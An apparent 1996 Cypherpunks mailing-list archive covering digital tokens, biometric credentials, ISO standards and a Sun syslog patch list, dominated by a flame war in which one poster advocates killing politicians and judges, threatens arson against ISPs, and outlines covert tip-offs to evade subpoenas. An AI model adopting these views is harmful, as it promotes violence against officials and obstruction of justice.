> If your overall point is that even without digital cash, we would end
> up with some form of electronic money eventually anyway, I think it is
> true.  Entrepreneuers abhor a vacuum, and if the need is there it will
> be met.  But the fact is that we are likely to have digital cash before
> all these other things, so I don't really see the whole scenario coming
> to pass.  I do think a lot of your specific applications are
> interesting, though, and hopefully there will be many more creative
> uses of this technology.  I know Eric Hughes a while back was talking
> about a way for players to transfer wealth between MUD games using a
> token based system.  There are a lot of game possibilites.

  Agreed- but what system did Eric Hughes use to implement his idea ?  I've
  yet to find one that isn't buried in patents/controls.  Which leads...

  To my "point" if I had one, and back to my mini-rant ... nobody has any
  CLUE what these tokens could be used for eventually.  This is an entirely
  new mechanism, one in which unique values can be transferred between
  people without losing their value to something as simple as duplication.
  Who knows what could happen if the technology were open to the public- I
  have big doubts that my car's head lights will be buying electricity from
  it's powerplant (with the electrical systems overhead charge of course),
  but I don't think it's unreasonable to think tokens could be passing all
  around the net for priority bandwidth, or CPU cycles, etc.  So if there is
  a point, it's that we JUST DON'T KNOW what could happen, what this totally
  new capability could be used for, and we won't unless we have access to it
  and all the net.developers get a shot.  This sounds like I'm complaining
  and whining like a child for one simple reason- I am.  This also sounds
  like interesting stuff with a lot of potential for one reason- it is.

  In all of these threads, I forgot to make it clear that I have the UTMOST
  respect for the people who design and implement these token systems, and
  crypography people in general.  In the end, if nobody wants to give the
  end user a way to put value into these tokens, so be it- I didn't invent
  the system(s), all I can do is bitch and moan about it.  But if someone
  came up with a radically new process for creating microchips, they would
  NOT just patent the process and sell the chips, they'd license and sell
  the process as well.

  I'll shut up after this, even I'm getting sick of hearing me-- these
  tokens systems may be the only good transport of a dollars value, but the
  transportation of dollars is not the only good use of these token systems.

> Hal
>-- End of excerpt from Hal

  Jeff.


-- 
     http://www.blackmagic.com/people/jeff    Simply Be.    SKYDIVE!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 30 Mar 1996 14:52:49 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <m0u2ndw-0008zuC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:54 PM 3/29/96 -0500, Black Unicorn wrote:
>On Fri, 29 Mar 1996, jim bell wrote:

>> >I thought I would take the time to let everyone know that this is 
>> >baseless as well.  Most jurisdictions forbid third parties to reveal 
>> >prosecution inquries to the principal for which they are holding 
>> >documents or other information.  A VERY few have laws on the books that 
>> >require this disclosure.  Switzerland is no longer one of them.
>> 
>> As usual, Unicorn is FOS.  Not entirely in his facts, but in his 
>> conclusions.  To "forbit third parties to reveal prosecution inquiries" is 
>> an obvious violation of freedom of speech, and in fact is PRIOR RESTRAINT.  
>> Maybe Unicorn can't see what's wrong with that, but I can.  It is unclear 
>> whether this has ever been tested in court, or whether that test occurred 
>> recently.
>
>(Snore)  How many cases do you want me to cite that hold that the 
>disclosure of an inquiry with the intent of evasion is conspiracy and 
>entails criminal charges?

You _do_ have an odd way with words.  "entails" criminal charges?  Hey, they 
can charge ANYBODY with ANYTHING, but that doesn't mean that a crime has 
actually been committed.  Further, it isn't clear that anybody is obligated 
to respond to a subpoena without the possibility of a court challenge, and 
your fantasy about the cops showing up and trying to strongarm the ISP is 
laughable at best.  

>Do you honestly think you can evade prosecution for suborning the 
>destruction of material evidence in a criminal trial?

Who said anything about "destruction of material evidence"?  Refusing to 
hand over information until AFTER a court has properly responded to a 
challenge to a subpoena is old hat to newspapers, TV stations, and other 
media-organizations who are occasioinally served with a subpoena.  The ISP 
need merely say, I'm challenging this subpoena in court, go away 
motherfuckers!  ISP prepares a challenge, "CC's" ALL the affected 
individuals, (including the person whose information is desired!),  and the 
validity of the subpoena is tested.

>Please.

My feelings exactly.  Please stop acting like a government suck-up all the 
time.  Maybe you're paid to do it, but unless you're a plant, you're on your 
free time now.

>> For example, if I ask my ISP to send me an anonymous, encrypted message 
with 
>> the word, "Rosebud" in it to me if he receives any requests to tap my 
>> connection, he can do so with no fear of being discovered, because no third 
>> party can decrypt the message, know who is is from, or know the real 
meaning 
>> of the word, "Rosebud" in the context of an encrypted, anonymized message.  
>> Further, since the whole thing is by pre-arrangement, even I cannot prove 
>> (to the satisfaction of a third party) that the message really meant what I 
>> would interpret it to mean.  The message is useful to me, as a warning, but 
>> it could never turn around and "bite" the ISP.
>
>Unfortunately, by the time (in the case of domestic investigations, and 
>foreign investigations in more compliant jurisdictions) it gets to the 
>point where authorities are checking about, they will have walked into 
>the ISP and personally requested the information with subpoena in hand.  

Again, you blindly assume that the subpoena can't be challenged in court.  
It can be.  


>Perhaps the ISP with the nerve to destroy material evidence in the 
>presence of law enforcement exists,

You keep inventing these phony scenarios, building up these straw men and 
knocking them down.  Clearly, your underlying argument is quite weak.  I 
said nothing about "destroying evidence."  In fact, the ISP could simply 
encrypt everything with the target's public key, and keep it.  That's not 
"destroying evidence," that's locking it away in such a way so that nobody 
except the target can unlock it.   Ideally, this would be done automatically 
every time a person calls his ISP, although the software to do this probably 
doesn't exist yet.  The result would be that whenever the target was NOT 
connected to the ISP, there would be no information on the ISP's system that 
could be decrypted by the ISP operator.

This would be one of those inventive future uses of encryption, well beyond 
plain vanilla PGP, which we must assure ourselves will be developed.  The 
kind of thing you dread, obviously.


>but I sincerely doubt this ISP will 
>escape serious prosecution for doing it.

I sincerely doubt Unicorn will ever stop being a government suck-up.

> At the very least the employees 
>of the ISP will have knowledge of this practice.  Unless it's a single 
>person run ISP, I doubt you're going to be able to keep everyone from 
>testifying.  What you propose is a crime in the United States, and in 
>many foreign jurisdictions.

If an ISP's system automatically encrypts all received message's with the 
destination's public key when received, and doesn't keep an unencrypted copy 
around, showing up at that ISP's location with a warrant will result in ZERO 
(ZIP, ZILCH, NEGATORI, etc) information that can be  delivered, unencrypted, 
to the cops.

>> The end result is that your foolish opinion of what the law allows will 
>> simply become irrelevant: The government cannot mandate what it cannot 
>> enforce, and it cannot enforce what it cannot detect.
>
>I have often noted that the best defense is the lack of detection in the 
>first place. 

No, an even better defense is to make it absolutely impossible, as a matter 
of business practice, to assist the police with any kind of an 
investigation.  Before you go off and shoot your mouth off about how evil 
and bad that is, you need to remember that regular destruction of records is 
an acceptable practice in any company today.  While courts will look askance 
at it when it does not appear to be a regular business practice (say, the 
company gets sued today and they have a mass shredding tomorrow) there is 
nothing wrong about regularly making past records unavailable by shredding, 
burning, erasing, or by any other method. 

Making those records SELECTIVELY unavailable by encrypting them with 
somebody else's public key and keeping them has probably never been tested 
in court, but if the business contracts this ISP regularly signs have this 
as a provision of doing business, the court can't squawk after the fact.  
After all, the ISP might have simply erased the files, keeping them from 
being accessed by ANYBODY, including their "owner."

> Unfortunately this is the oft denounced "security through 
>obscurity."  Look, I know it's fun to imagine you can thwart the 
>authorities with impunity within the United States. 

Hey, you can FREQUENTLY "thwart the authorities."  If I have evidence of a 
crime in my house, the cops can't come in unless they have a warrant.  If I 
know they're coming, and can destroy it untraceably, I WIN!  See, that's how 
freedom works!  It's  nearly the exact opposite of "the government can do 
anything it wants, any time it wants, and anybody who frustrates them is a 
criminal!"

Naturally, you won't like this.

>Unfortunately it is 
>a fantasy.  The system you propose requires someone to be present in the 
>ISP 24 hours a day.  It requires some method of getting word to the 
>operator who will trigger the alarm both that an investigation is 
>looming, and who it entails.  It requires someone to talk to the 
>authorities and stall them while the message is sent.  It requires you to 
>be sitting at the screen when the message is received (perhaps this isn't 
>a problem for Mr. Bell), or to get home before the law enforcement 
>officials get a 2 hour warrant and open your door.

Yet another one of your multiple problems is that you have no imagination 
when it comes to "thwarting the authorities."  I do.  Don't try to tell me 
what can't be done, because I'll turn around and tell you how it CAN be 
done!  I just did.  The actual implementation waits for some slick coder to 
do it, but I give you 5 years, tops, before it's in regular usage.  And 
that's assuming they're all a bunch of lazy bastards.



>> 3.  And the ever-popular, "He's afraid of getting killed, or his ISP 
>> business torched, if word later leaks out that he failed to inform his 
>> customer of an investigation."
>  Don't underestimate the significance of such 
>> a risk to those people.  Destruction of even a full phone switch would not 
>> have fazed ATT in the 1960's, but a small ISP depends on valuable equipment 
>> at (presumably) a single location.  Getting a person mad at them for 
failing 
>> to anonymously inform them of an inquiry would NOT be the best tactic for 
>> these small-time operators.
>
>Your last resort in all of your arguments seems to be murder, extortion, 
>the threat of bodily harm, arson or assault, or destruction of private 
>property.

A list which seems to be the current modus operandi of most levels of 
government in America, today.

In any case, I think it's fair to hold an ISP to his word and contract.  If 
the "normal" referee to such contracts (the court system) becomes biased 
because it begins to be an interested party to the enforcement of the 
contract terms, then bypassing that court system is unavoidable and is 
entirely appropriate.

You won't like this, either.


>> >Even if a judge was convinced by the defense not to levy heavy fines 
>> >against a third party who pleaded that he or she was simply unable to 
>> >comply, informing the principal would literally assure such fines would 
>> >be imposed regardless. 
>> 
>> Again, you assume that informing "the principal" would be detectable.  Your 
>> wishful thinking is palpable.
>
>No.  I speak from experience when I say that "proof" of complicity is 
>rarely a requirement.  The judge need only suspect wrong doing.  It's 
>easy to levy contempt fines, and very hard to overturn them.  

It's easy to kill, and hard to resurrect the dead.

>The 
>standard in most jurisdictions is "clearly erronious."  Tough stuff.

Yes, I'd say you're "clearly erronious."  

If you can repeatedly describe, in nominally accurate terms, how abusive the 
government has become and NOT oppose its actions with every fiber in your 
being, then YOU have made yourself part of the problem.

>
>> I really wish you'd be able to distinguish 
>> what "the law" could do, given limitless knowledge of the actions of the 
>> population, and the REAL WORLD, in which those judges and prosecutors and 
>> cops are limited in what they can do by what they can know.  This is 
>> critical, because we are rapidly approaching a time in which what these 
>> people know will be dramatically limited by many of the technologies 
>> regularly discussed on Cypherpunks.
>
>Unfortunately, fines and penalities are imposed every day based on 
>assumptions by the trier of fact.  Go watch a major court case some time.


You still haven't given me specific examples.


>> Bullets could easily fly. 
>
>And will.  I've seen this happen.  Trustee refuses to produce documents, 
>court imposes compelled discovery, documents burn or are lost or have been 
>stolen, trustee (who can be assigned no direct evidence of complicity) is 
>fined heftily.  A case I was not personally involved in saw the judge 
>jail the trustee for 4 months.

That's not what I'm referring to.  Judges are mortal.  If they abuse the 
sense of propriety of the average indidivual, they SHOULD be removed, by 
legal methods if possible, by other methods if not. 

Remember that prosecutor who died in Boston a few months ago?  You know, the one who made the national news?  I'm still waiting to see how that one came out, but I suspect they will never be able to prove who did it, and may not even be able to find out.  


>> >With Mr. Bell as a defense attorney, who needs prosecutors?
>> 
>> If I intended to limit myself to the tools of the court room (that's the 
>> enemy's playpen, BTW) I would probably be just as ineffective as the next 
>> defense attorney.
>
>So again, we see Mr. Bell in his basic form.  Violent offender.  He will 
>obtain by force that which he cannot argue into his hands.

Except that in a court room, the decision maker is PAID by a party to the 
case, the government.  That sounds like a classic conflict of interest to me.  What's the old rhyme,

"Treason doth not prosper, what is the reason?
Where treason does prosper, none dare call it treason."

Jim Bell
jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mike@fionn.lbl.gov (Michael Helm)
Date: Fri, 29 Mar 1996 15:50:14 +0800
To: Jonathon Blake <grafolog@netcom.com>
Subject: Re: Why Americans feel no compulsion to learn foreign languages
In-Reply-To: <grafolog@netcom.com>
Message-ID: <199603282112.NAA08380@fionn.lbl.gov>
MIME-Version: 1.0
Content-Type: text/plain


On Mar 27, 10:57pm, Jonathon Blake wrote:
> 	One other advantage to knowing a language other than
> 	English.  Legal encryption.  << Unless a federal law

> 	encrypt it with PGP.  Would the cryptanalysts recognise
> 	the plain text, even if they had it?  >> 

Well, it's a special case of security by obscurity, isn't it?
If the language is something unusual, maybe that helps, but
if the language is too obscure, you may be identified
(by your ethnicity, your history, or your friends/community) as
a speaker of it.  I guess it does raise the economic cost
of "decipherment" some.  But many immigrant parents have learned
to their embarrassment that this kind of encoding doesn't
work too well %^)
 
The Navajo/Na Dene codetalkers (WW II) developed a real arcane jargon,
so I was told.  Maybe it was because the conditions of war were
completely different than their language's environment so they
were forced to invent words, or maybe they thought it was a good
idea, or whatever.  But I believe transcripts of their transmissions
are often mostly unintelligible to native Navajo speakers who weren't in
the know.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Fri, 29 Mar 1996 15:58:43 +0800
To: cypherpunks@toad.com
Subject: Canada's ISO standards body?
In-Reply-To: <Pine.SOL.3.91.960328154547.17117D-100000@orb>
Message-ID: <Pine.3.89.9603281502.A24841-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 28 Mar 1996, Eric Young vented:

> exercise with no money to spend, I have learnt to dislike the way some 
> the 'standards' are not available (by which I mean available for 
> the masses via the internet, ala rfc's).
> 
> eric (venting some frustration that build up during the just completed
>       'quest for the X509v3 spec')

Speaking of which, could someone tell me who Canada's standards body and 
rep to the ISO is (and if that's where I've gotta go to get my hands on X.509
and all those other X.docs.). Any addresses would be helpful too.

(Excusa mi si eso no esta relevant to bilingualpunks ;-> )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 29 Mar 1996 15:56:15 +0800
To: cypherpunks@toad.com
Subject: Re:  The Law Loft: Surviving the Biometric I.D. Card
Message-ID: <199603281944.LAA20391@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I have been surprised not to hear more about this aspect of the
immigration reform laws.  Unfortunately the alert which Tim forwarded
is out of date, and I believe the reforms did pass in some form.  I
view biometric identification as a very disturbing development and
I'd like to hear more about the wording of the bills as finally passed.

If they really want to give people a card which proves their legal
residence in the US, a less intrusive approach is possible.  Rather
than set up a database of all employees, and/or give each person an
official identity card, instead have people come and prove their residency,
then give them a card with the biometric information and a blind signature.
No other information goes on the card, no information goes into a
database.  The signature is a certificate testifying that the person
with the particular thumbprint is legal to work in the US.  The card
can't be transferred since no one else has that thumbprint.  But no
identifying information is recorded.  There is no advantage in people
coming in twice to get more than one card since their print will be
the same each time, so no database is needed.

A simpler approach dispenses with the blind signature and just issues a
regular signature on the thumbprint or other biomarker.  This is about as
good since proving residency will probably require at least an incidental
display of identity papers, so you are already trusting the agency not to
log you, and you can just as easily trust them not to log the signature.

This is an approach which accomplishes the goal with a minimal intrusion
into people's privacy.  I don't know how it compares with current
biometric concepts - maybe this is similar to what they are proposing,
minus the database.  But there is a general principle that government
regulations should use the least restrictive means where they violate
people's rights, such as the seriouss privacy violations in the current
proposals.  So I think it should be possible to make a strong argument
that privacy protecting alternatives which accomplish the objective must
be considered.

The key concept is to unlink identity from the credential.  That is the
crucial idea of credentials, one which has not yet pentrated the
popular consciousness.  Maybe we need to start pushing it more.  You
don't have to prove your identity to prove you have certain
qualifications.  There is no need to tie everything to a central
identifier.  A system of dispersed, stand-alone credentials will be far
better at protecting privacy.  Blind signatures can help protect against
cheating, but policy can work too, especially when credentials are issued
by a public agency on a large scale, so systematic and secret record
keeping is impractical since so many people are involved.

I know a lot of people will oppose even this form of biometric
information, which is not tied to identity.  Perhaps we could have some
discussion on the degree to which people see this kind of system as a
privacy threat.  If the credential concept is new we could discuss that,
too.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 30 Mar 1996 15:34:26 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <m0u2oJE-0008yhC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:06 PM 3/29/96 -0500, Black Unicorn wrote:
>On Fri, 29 Mar 1996, jim bell wrote:
>
>> At 05:32 AM 3/29/96 -0500, Black Unicorn wrote:
>> >On Thu, 28 Mar 1996, jim bell wrote:
>> >
>> >> At 03:46 PM 3/28/96 -0500, Black Unicorn wrote:
>> 
>> >You clearly don't understand.  You are an ass making an assumption that a 
>> >court cares or believes that the witness can actually produce the 
>> >requested information or not.  Fines tend to be imposed regardless.
>> 
>> Bullets don't care that a judge was justified in his decisions, either.  
>
>God I hope you keep talking like this.  The list might not have to endure 
>you anymore unless you get a cushy prison cell with internet hookups.

As far as I know, the 1st amendment to the US Constitution is there to 
protect unpopular, as well as popular, speech.  And while it may be a 
surprise to you, my kind of speech is getting far more popular and has been 
for the last few years.  Much of the reason for this has been the 
abusiveness that you describe but don't seem to try to do anything about.

In any case, the "clear and present danger" standard to speech such as mine 
is not satisfied.  Nobody is under the illusion that anybody else is going 
to rush right out and kill someone as a consequence of my comments.  It is, 
therefore, protected speech.  (Not that I really have much respect for the 
distinction, anyway.  The issue is, is there some OFFICIAL distinction, and 
there apparently is.)

>> Ultimately, your repeated argument is simply, "The legal system can be 
>> abused by those who work in it."
>
>I wouldn't call fines imposed on a third party who clearly was complicit 
>in the destruction of material evidence to a proceeding "abuse."


Since you keep inventing these straw men and knocking them down, it is 
really questionable whether you have any kind of good judgment as to who is 
"clearly complicit in the destruction of material evidence."

It would be far more effective and credible if you would at least admit that 
not every action by a third party which has the effect of frustrating some 
court is actionable.  The simple action of FAILING to store information that 
may later be wanted by the officials is an excellent example, for instance.

Naturally, you won't like this either.  And you certainly won't want to rise to my challenge and draw a distinct line, because that would put you to your proof, and you have none.


>  I don't challenge this claim, in fact my 
>> position depends on its truth; my assertion  is that the current legal 
situation is 
>> out of the control of people faithful to the meaning of the Constitution, 
>> and has been so for a long time.  One of the main reasons I promote a 
>> de-facto (and unofficial) death penalty for recalcitrant politicians and 
>> other government employees is because the traditional "checks and balances" 
>> system seems to no longer be working for the interests of the average 
citizen.
>
>Yadda yadda yadda.

What?!?  you don't have a better response to this?


>> >> And in any case, I consider it highly doubtful that anybody would 
contract 
>> >> with an escrow agent and identify himself by name
>> >
>> >The same way no one creates Panamanian companies with their own name.  So 
>> >what?  Third parties are still fined heavily.
>> 
>> Any specific examples?
>
>Sure, several.  See my large note on the subject of asset protection.

Well, you're trying to change the subject.  It's "escrow agents."  And the 
question is, "must an escrow agent always know the identity of the people 
for whom the information is kept."  The simple answer, invoking existing 
software technology, is, "no."  

So now you need to explain why courts are going to be able to force a 
third-party to give what he doesn't know he has, and in fact nobody else 
knows either.  You'll fail at this task, of course, because the answer is 
not politically correct by your standards.

>> >And simpler for courts to fine them out of existance (which happened to 
>> >several banks, trust companies and agents in Cayman and Panama.
>> 
>> I guess you really don't realize that every claim you make demolishes the 
>> justification for your obvious hostility to a system which prevents exactly 
>> the kind of abuses you list.  (Although it really isn't clear whether you 
>> would classify them as "abuses.")
>
>My hostility is for a system that allows mob mentality and murder run the 
>streets like a bad day in Beruit.

A position which fails to do anything about the current problems in society. 
 Show me that my solution is worse than the status quo, and you'll have a 
point.  Until then, you're just a complainer.

>
>> >They need only suspect or have reason to suspect it might be exculpatory.
>> _                                                             ^^^^^^^^^^^
>> Sloppy word usage.  I think you meant, "incriminating."  Typical for you.
>
>Actually I should have said "material."

Still sloppy.  Classic Unicorn.


>> In this day and in this country, "going to law school" is basically 
>> synonymous with "learn to get along with the current legal system."  It 
>> should have been obvious long ago that I don't consider the current legal 
>> system to be worth living with.
>
>Suicide is always an option.

I take great pains and give them to others.  

Anyway the reason suicide is a 
silly option is that it assumes that the problem lies with me, not others.  
Obviously, other people are complaining about the same situation, so the 
problem is not my fault.  But I'm hoping to be part of the solution.

You REALLY won't like this!

>I don't much like the system in the United States either.  But there are 
>two ways around it.  Ways that work, and ways that don't.

There are not ONLY "two ways around it."  There are also clearly "ways that 
Unicorn likes" and "ways Unicorn doesn't like."  It is possible that if they 
were studied carefully a person would discover that (warning!  Set theory 
terms coming up!) intersection between the two groups, "Ways that work" and 
"ways that Unicorn likes" is zero.  As if by design.


>Encouraging random murder and mob justice is, in my view, in the second 
>field.

I've never encouraged "random murder."  Quite the opposite:  It would be far 
more accurate to say that I encourage VERY SELECTIVE killing.  It is not, 
however, GOVERNMENT SPONSORED killing, which is why you won't like it.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 30 Mar 1996 17:42:20 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <m0u2ism-0008yfC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960329155806.15388C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 29 Mar 1996, jim bell wrote:

> At 05:49 AM 3/29/96 -0500, Black Unicorn wrote:
> >On Thu, 28 Mar 1996, jim bell wrote:
> >
> >> Escrowing encrypted keys makes them useless to subpoena, and in 
> >> fact it helps the key owner because the escrow agent can (and, in fact, 
> >> must!) be obligated to inform the key owner if his key is requested.
> >
> >I thought I would take the time to let everyone know that this is 
> >baseless as well.  Most jurisdictions forbid third parties to reveal 
> >prosecution inquries to the principal for which they are holding 
> >documents or other information.  A VERY few have laws on the books that 
> >require this disclosure.  Switzerland is no longer one of them.
> 
> As usual, Unicorn is FOS.  Not entirely in his facts, but in his 
> conclusions.  To "forbit third parties to reveal prosecution inquiries" is 
> an obvious violation of freedom of speech, and in fact is PRIOR RESTRAINT.  
> Maybe Unicorn can't see what's wrong with that, but I can.  It is unclear 
> whether this has ever been tested in court, or whether that test occurred 
> recently.

(Snore)  How many cases do you want me to cite that hold that the 
disclosure of an inquiry with the intent of evasion is conspiracy and 
entails criminal charges?

Do you honestly think you can evade prosecution for suborning the 
destruction of material evidence in a criminal trial?

Please.

> Furthermore, the development of good encryption will allow a willing ISP 
> (for example) to send an encrypted (and possibly semi-anonymous) message to 
> the target of the investigation  (or possibly a public USENET area, 
> unaddressed), containing a pre-arranged alarm code to be sent to the target 
> of the investigation, in such a way that any other people (for example, the 
> brainless cops) won't know.  The target will be assured (though encryption 
> and signing, or prior arrangement) that the message could only have 
> originated from the contractor (ISP) but the target (and nobody else, as 
> well) will not be able to prove this knowledge to a third party.
> 
> For example, if I ask my ISP to send me an anonymous, encrypted message with 
> the word, "Rosebud" in it to me if he receives any requests to tap my 
> connection, he can do so with no fear of being discovered, because no third 
> party can decrypt the message, know who is is from, or know the real meaning 
> of the word, "Rosebud" in the context of an encrypted, anonymized message.  
> Further, since the whole thing is by pre-arrangement, even I cannot prove 
> (to the satisfaction of a third party) that the message really meant what I 
> would interpret it to mean.  The message is useful to me, as a warning, but 
> it could never turn around and "bite" the ISP.

Unfortunately, by the time (in the case of domestic investigations, and 
foreign investigations in more compliant jurisdictions) it gets to the 
point where authorities are checking about, they will have walked into 
the ISP and personally requested the information with subpoena in hand.  

Perhaps the ISP with the nerve to destroy material evidence in the 
presence of law enforcement exists, but I sincerely doubt this ISP will 
escape serious prosecution for doing it.  At the very least the employees 
of the ISP will have knowledge of this practice.  Unless it's a single 
person run ISP, I doubt you're going to be able to keep everyone from 
testifying.  What you propose is a crime in the United States, and in 
many foreign jurisdictions.

> The end result is that your foolish opinion of what the law allows will 
> simply become irrelevant: The government cannot mandate what it cannot 
> enforce, and it cannot enforce what it cannot detect.

I have often noted that the best defense is the lack of detection in the 
first place.  Unfortunately this is the oft denounced "security through 
obscurity."  Look, I know it's fun to imagine you can thwart the 
authorities with impunity within the United States.  Unfortunately it is 
a fantasy.  The system you propose requires someone to be present in the 
ISP 24 hours a day.  It requires some method of getting word to the 
operator who will trigger the alarm both that an investigation is 
looming, and who it entails.  It requires someone to talk to the 
authorities and stall them while the message is sent.  It requires you to 
be sitting at the screen when the message is received (perhaps this isn't 
a problem for Mr. Bell), or to get home before the law enforcement 
officials get a 2 hour warrant and open your door.

> You may ask, "Why would the operator of a small ISP want to take even a 
> minor risk informing the target of the investigation?"  There are a number 
> of obvious answers:
> 
> 1.  He's promised his customer to do so.

>Snort<

> 2.  It's in the contract.

>Laugh<  What happened to no evidence that the ISP informed you of an 
investigation?

> 3.  And the ever-popular, "He's afraid of getting killed, or his ISP 
> business torched, if word later leaks out that he failed to inform his 
> customer of an investigation."

>Chortle<

  Don't underestimate the significance of such 
> a risk to those people.  Destruction of even a full phone switch would not 
> have fazed ATT in the 1960's, but a small ISP depends on valuable equipment 
> at (presumably) a single location.  Getting a person mad at them for failing 
> to anonymously inform them of an inquiry would NOT be the best tactic for 
> these small-time operators.

Your last resort in all of your arguments seems to be murder, extortion, 
the threat of bodily harm, arson or assault, or destruction of private 
property.

> >Even if a judge was convinced by the defense not to levy heavy fines 
> >against a third party who pleaded that he or she was simply unable to 
> >comply, informing the principal would literally assure such fines would 
> >be imposed regardless. 
> 
> Again, you assume that informing "the principal" would be detectable.  Your 
> wishful thinking is palpable.

No.  I speak from experience when I say that "proof" of complicity is 
rarely a requirement.  The judge need only suspect wrong doing.  It's 
easy to levy contempt fines, and very hard to overturn them.  The 
standard in most jurisdictions is "clearly erronious."  Tough stuff.

> I really wish you'd be able to distinguish 
> what "the law" could do, given limitless knowledge of the actions of the 
> population, and the REAL WORLD, in which those judges and prosecutors and 
> cops are limited in what they can do by what they can know.  This is 
> critical, because we are rapidly approaching a time in which what these 
> people know will be dramatically limited by many of the technologies 
> regularly discussed on Cypherpunks.

Unfortunately, fines and penalities are imposed every day based on 
assumptions by the trier of fact.  Go watch a major court case some time.

> >Criminal charges of obstruction could easily attach.
> 
> Bullets could easily fly. 

And will.  I've seen this happen.  Trustee refuses to produce documents, 
court imposes compelled discovery, documents burn or are lost or have been 
stolen, trustee (who can be assigned no direct evidence of complicity) is 
fined heftily.  A case I was not personally involved in saw the judge 
jail the trustee for 4 months.

Attorneys are likely to lose their licenses, same with trustees.

> You repeatedly state what might, hypothetically, happen, but you don't back 
> it up with a realistic assessment of what actually would _likely_ happen.

See above.  Happened.  Been there.  Seen that.

> > Obstruction in connection with narcotics cases or other major 
> >felonies are generally extraditable offenses as well.
> 
> Someday, obstruction of the Constitution by government agents will be a 
> death-penalty crime.

Yadda yadda yadda.

> >Once again Mr. Bell pulls legal analysis out of his rectum rather than 
> >basing it in fact or research.
> >
> >With Mr. Bell as a defense attorney, who needs prosecutors?
> 
> If I intended to limit myself to the tools of the court room (that's the 
> enemy's playpen, BTW) I would probably be just as ineffective as the next 
> defense attorney.

So again, we see Mr. Bell in his basic form.  Violent offender.  He will 
obtain by force that which he cannot argue into his hands.

> I've frequently found that the question of who wins in any confrontation is 
> strongly affected by whether I allow myself to be lured into the home 
> territory of the other.  This is actually more a psychological battle than a 
> physical one.

[large amounts of psycho-babble deleted]

> This may sound unfair to people brainwashed to believe that the court system 
> is and should be the final arbiter, but I suggest that long ago they lost 
> whatever moral authority they once might have had. Every time you talk about 
> them fining or prosecuting some third party for not cooperating, you 
> demolish your own claims.

What claims?

> Jim Bell
> jimbell@pacifier.com

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@mailhost.infi.net>
Date: Sat, 30 Mar 1996 20:58:38 +0800
To: "Brookfield Economics Institute (U.S.A.) Limited" <brookfld@netcom.com>
Subject: Re: suggestions for starting an e-bank
In-Reply-To: <199603282331.PAA22199@mail.instanet.com>
Message-ID: <Pine.SV4.3.91.960329165134.26451A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


The marketplace is unforgiving. If your friend doesn't know what services 
to offer, and what his mooted market niche is.....wait, never mind that. 
Actually, I am an expert on the market for e-cash. I work for $250 per 
hour. Trust me, I will take good care of him.Have him e-mail me direct.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark.Graff@Eng.Sun.COM (Mark Graff)
Date: Sat, 30 Mar 1996 16:03:50 +0800
To: cypherpunks@toad.com
Subject: Re: Sun patch pulled
Message-ID: <199603300105.RAA07911@liberty.eng.sun.com>
MIME-Version: 1.0
Content-Type: text/plain


Folks,

I am the person responsible at Sun for coordinating security-related patches.
I got several copies of Wednesday's message about Sun's syslog/libc patches.

There are plenty of disasters we can blame on ITAR, but the statement

 > Yup, that's right.  The syslog hole that was so well publicized by
 > CERT will remain open indefinitely because the ITAR makes it illegal
 > for Sun to distribute the fix!

is in fact 100% incorrect. I know; I was personally involved at every stage.

I'm afraid the detailed explanation which follows is necessarily stultifying.
But the key points are:

1. Our syslog patches (and in fact all of our security-related patches) are
available to anyone who wants them, anywhere in the world, whether they are a
Sun customer or not and whether they have a support contract or not. This
has been Sun's policy since about 1990, and it hasn't changed.

2. We did make a change in February--it seems fairly routine to me, but you
be the judge--but we weren't prodded by any government figure. We were just
making sure that we complied with the letter of the law. That's no fun either,
but it's a far cry from "gummint dweeb[s] whispering threats".

3. We didn't document the change very well, which surely contributed to the
confusion. I expect we will update the README files to try to explain this
better.

OK, now before I lose you in the morass of detail that follows, please note
this. Sun maintains an alias, "security-alert@sun.com", for questions about
security issues, especially as they relate to patches and fixes. I'm the person
who tends it (I got about 2,000 inquiries last year) and I will be glad to
answer any questions like this in the future. (Please send them to the alias,
not to me: it's got backup coverage and my personal e-mail doesn't).

If this inquiry had gone to any of our Solution Centers, they would have come
up with this answer, too, by the way. All right, Here We Go...


SYSLOG/LIBC PATCHES

Here is the list of patches currently available for libc to patch the syslog
vulnerability. Note that, for some versions, there are both "U.S." and
"international" versions. This distinction is the source of the confusion.
I'll explain it later.

        PATCH #     VERSION                 RELEASED
        ---------   -----------             ------------
        100891-13 - SunOS 4.1.3             Oct 27, 1995 (International)
        101558-07 - SunOS 4.1.3_U1          Oct 27, 1995 (International)
        102545-04 - SunOS 4.1.4             Nov 16, 1995 (International)
        100890-13 - SunOS 4.1.3             Feb 21, 1996 (US only)
